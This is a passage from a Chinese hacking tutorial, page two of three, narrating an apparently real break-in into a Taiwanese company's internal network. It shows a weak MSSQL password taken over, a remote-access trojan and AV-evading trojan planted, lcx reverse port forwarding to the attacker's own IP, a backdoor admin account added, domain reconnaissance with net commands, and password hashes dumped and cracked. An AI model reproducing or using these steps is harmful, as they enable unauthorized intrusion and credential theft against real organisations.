在台湾某内网穿行

二、樱花浪子

　　正在QQ泡MM，丢丢MM说弄了一个1433弱口令，我晕了，美女的运气怎么这么好呀，据说还种上鸽子了，但是想获得3389权限，试了好多方法都不行，因为这台肉鸡配置实在不错，大概听了一下情况，貌似在内网，在鸽子里的CMDSHELL里执行ipconfig /all，返回的是192.168.0.4。她也做端口映射了，可就是连不上。我赶紧配一个免杀木马让她给我弄上去，貌似服务器有诺顿，我又把LCX大哥编译的端口工具传上去了。在本地执行：lcx.exe -listen 1234 9833，在肉鸡上执行：lcx.exe -slave 俺的IP　1234　127.0.0.1 3389，图3，然后在连127.0.0.1:9833，可就是连不上，如图4，图5所示。







　　难道是3389端口改成别的了，或者是没开终端，不可能呀，于是上传3389的工具在重新开3389还是不行，就是一个字，连不上。不一会丢丢说，直接连外网的那个可以连，于是在肉鸡上的CMD下添加一个超级用户，在连60.249.43.227还是连不上，在肉鸡上看这个用户确实已经存在了，俺太菜，也不晓得怎么回事。

　　于是想这是肉网，是不是有传说中的域呀，如果拿到域管理员的用户和密码一切就OK了，由于俺对域也不熟悉，于是去GOOGLE先学习了一会，在鸽子CMD下执行：net view。图6。这句命令是显示域列表、计算机列表或指
定计算机的共享资源列表。继续执行：Net Group /domain，返回了图7的结果。





　　莫非没有权限，net group是显示服务器名称及服务器的组名称，/domain在当前域的主域控制器中执行该操作。
提示什么网域OPEN，莫非是域管理器，接着执行：net view /domain:OPEN，这是查看指定的域，返回了图8所示。

　　有个SERVER7，在鸽子上线计算机名好象就是这个，俺对域也不熟悉，连3389也没弄到，实在不好搞，突然想起了可以先把它的哈希抓回来，内网的密码基本都一样，破出来就好办了，就算不是域管理员的，破出来用ICP连接内网其它机器也可以呀，不过03的系统貌似连过去也是GUEST权限吧，直接在鸽子里上传抓哈希的工具，抓回来N多帐户，图9所示。


　　把抓回来保存文本格式，用LC5容笑汉化版破解hash，大约我喝了十杯咖啡的时间，基本都破解出来了，图10。

上一页  [1] [2] [3] 下一页